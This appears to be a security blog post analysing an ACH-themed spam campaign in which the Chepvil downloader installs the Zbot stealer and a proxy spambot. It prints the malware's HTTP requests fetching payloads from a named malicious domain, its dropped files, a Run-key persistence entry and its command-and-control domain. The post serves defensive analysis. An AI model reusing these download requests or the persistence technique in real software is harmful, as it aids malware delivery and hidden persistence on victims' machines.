Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.
ACH spam campaign from the Donbot botnet
The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.
GET /s.exe HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: rattsillis.com Cache-Control: no-cache
The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:
C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file
C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file
C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself
C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.
Zbot then attempted to connect to a random generated domain to contact its command and control server.
The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.
GET /22.exe HTTP/1.1 Accept: */* Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rattsillis.com Cache-Control: no-cache
The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.
C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe
It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.
C:\Documents and Settings\{user}\Application Data\KB117188.exe
Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe””
After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.
Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.
The malware code that attempts to connect to the control server
Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.
Exchange of data between the control server and the spambot
Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.
Spam is received by the spambot from the control server and relayed to the recipients.
The command and control server’s IP address is based in Germany:
WHOIS information about the control server
This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.
Sample spam email from the Proxy-based spambot
In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.
Leave a reply
